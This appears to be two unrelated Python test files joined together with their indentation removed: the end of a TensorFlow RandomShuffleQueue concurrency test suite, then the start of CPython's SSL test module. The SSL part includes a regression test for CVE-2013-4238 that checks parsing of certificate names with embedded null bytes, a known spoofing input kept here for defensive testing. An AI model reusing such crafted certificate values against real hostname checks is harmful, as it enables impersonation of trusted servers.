q = data_flow_ops.RandomShuffleQueue(
capacity=10,
min_after_dequeue=2,
dtypes=dtypes_lib.float32,
shapes=((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEquals(3, len(results))
# min_after_dequeue is 2, we ask for 3 elements, and we end up only
# getting the remaining 1.
results.extend(sess.run(dequeued_t))
self.assertEquals(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueManyFromClosedQueueWithElementsRemaining(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue_many(q.size())
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEqual(len(results), 3)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
# While the last dequeue failed, we want to insure that it returns
# any elements that it potentially reserved to dequeue. Thus the
# next cleanup should return a single element.
results.extend(sess.run(cleanup_dequeue_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(results), 4)
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_up_to(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 4, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0], results)
# There wasn't room for 50.0 in the queue when the first element was
# dequeued.
self.assertNotEqual(50.0, results[0])
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
time.sleep(0.01)
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0, 60.0], results)
# There wasn't room for 50.0 or 60.0 in the queue when the first
# element was dequeued.
self.assertNotEqual(50.0, results[0])
self.assertNotEqual(60.0, results[0])
# Similarly for 60.0 and the second element.
self.assertNotEqual(60.0, results[1])
thread.join()
def testBlockingEnqueueToClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed since it will complete
# before the queue is closed.
sess.run(blocking_enqueue_op)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
sess.run(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# The close_op should run after the first blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def blocking_close():
sess.run(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Wait for the close op to block before unblocking the enqueue.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
# Dequeue to unblock the first blocking_enqueue_op, after which the
# close will complete.
results.append(dequeued_t.eval())
self.assertTrue(results[0] in elems)
thread2.join()
thread1.join()
def testBlockingEnqueueManyToClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
size_t = q.size()
enqueue_op.run()
self.assertEqual(size_t.eval(), 3)
def blocking_enqueue():
# This will block until the dequeue after the close.
sess.run(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# First blocking_enqueue_op of blocking_enqueue has enqueued 1 of 2
# elements, and is blocked waiting for one more element to be dequeue.
for i in range(50):
queue_size = size_t.eval()
if queue_size == 4:
break
elif i == 49:
self.fail(
"Blocking enqueue op did not execute within the expected time.")
time.sleep(0.1)
def blocking_close():
sess.run(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Unblock the first blocking_enqueue_op in blocking_enqueue.
q.dequeue().eval()
thread2.join()
thread1.join()
# At this point the close operation will complete, so the next enqueue
# will fail.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
sess.run(blocking_enqueue_op)
def testSharedQueueSameSession(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
# TensorFlow TestCase adds a default graph seed (=87654321). We check if
# the seed computed from the default graph seed is reproduced.
seed = 887634792
q2 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=seed)
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q2.dequeue().eval(), 10.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q1.dequeue().eval(), 20.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
def testSharedQueueSameSessionGraphSeedNone(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=98765432)
q1.enqueue((10.0,)).run()
# If both graph and op seeds are not provided, the default value must be
# used, and in case a shared queue is already created, the second queue op
# must accept any previous seed value.
random_seed.set_random_seed(None)
q2 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
def testIncompatibleSharedQueueErrors(self):
with self.cached_session():
q_a_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_a")
q_a_2 = data_flow_ops.RandomShuffleQueue(
15, 5, dtypes_lib.float32, shared_name="q_a")
q_a_1.queue_ref.op.run()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.op.run()
q_b_1 = data_flow_ops.RandomShuffleQueue(
10, 0, dtypes_lib.float32, shared_name="q_b")
q_b_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_b")
q_b_1.queue_ref.op.run()
with self.assertRaisesOpError("min_after_dequeue"):
q_b_2.queue_ref.op.run()
q_c_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_c")
q_c_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shared_name="q_c")
q_c_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_c_2.queue_ref.op.run()
q_d_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_d")
q_d_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.op.run()
q_e_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_e")
q_e_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.op.run()
q_f_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_f")
q_f_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 4)], shared_name="q_f")
q_f_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_f_2.queue_ref.op.run()
q_g_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_g")
q_g_2 = data_flow_ops.RandomShuffleQueue(
10, 5, (dtypes_lib.float32, dtypes_lib.int32), shared_name="q_g")
q_g_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_g_2.queue_ref.op.run()
q_h_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=12, shared_name="q_h")
q_h_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=21, shared_name="q_h")
q_h_1.queue_ref.op.run()
with self.assertRaisesOpError("random seeds"):
q_h_2.queue_ref.op.run()
def testSelectQueue(self):
with self.cached_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(
data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = data_flow_ops.RandomShuffleQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
q2 = data_flow_ops.RandomShuffleQueue(15, 0, dtypes_lib.float32)
enq_q = data_flow_ops.RandomShuffleQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("is not in"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_many_op)
def _blockingDequeueUpTo(self, sess, dequeue_up_to_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(dequeue_up_to_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("was cancelled"):
sess.run(enqueue_many_op)
def testResetOfBlockingOperation(self):
with self.cached_session() as sess:
q_empty = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, (
(),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
dequeue_up_to_op = q_empty.dequeue_up_to(1)
q_full = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, ((),))
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(
self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(
self._blockingDequeueMany, args=(sess, dequeue_many_op)),
self.checkedThread(
self._blockingDequeueUpTo, args=(sess, dequeue_up_to_op)),
self.checkedThread(
self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(
self._blockingEnqueueMany, args=(sess, enqueue_many_op))
]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testDequeueManyInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_many(5)
deq2 = q2.dequeue_many(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueUpToInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_up_to(5)
deq2 = q2.dequeue_up_to(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue()
deq2 = q2.dequeue()
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
for _ in range(5):
results[0].append(deq1.eval())
results[1].append(deq2.eval())
q1.close().run()
q2.close().run()
for _ in range(5):
results[2].append(deq1.eval())
results[3].append(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testBigEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
sess.run(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertItemsEqual(elem, results)
def testBigDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(2, 0, dtypes_lib.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(sess.run(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
sess.run(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertItemsEqual(elem, results)
if __name__ == "__main__":
test.main()
|
test_ssl.py | # Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")
SVN_PYTHON_ORG_ROOT_CERT = data_file("https_svn_python_org_root.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
WRONGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_DER_to_PEM(self):
with open(SVN_PYTHON_ORG_ROOT_CERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if "LibreSSL" in s:
self.assertTrue(s.startswith("LibreSSL {:d}.{:d}".format(major, minor)),
(s, t))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = ssl.wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with ssl.wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
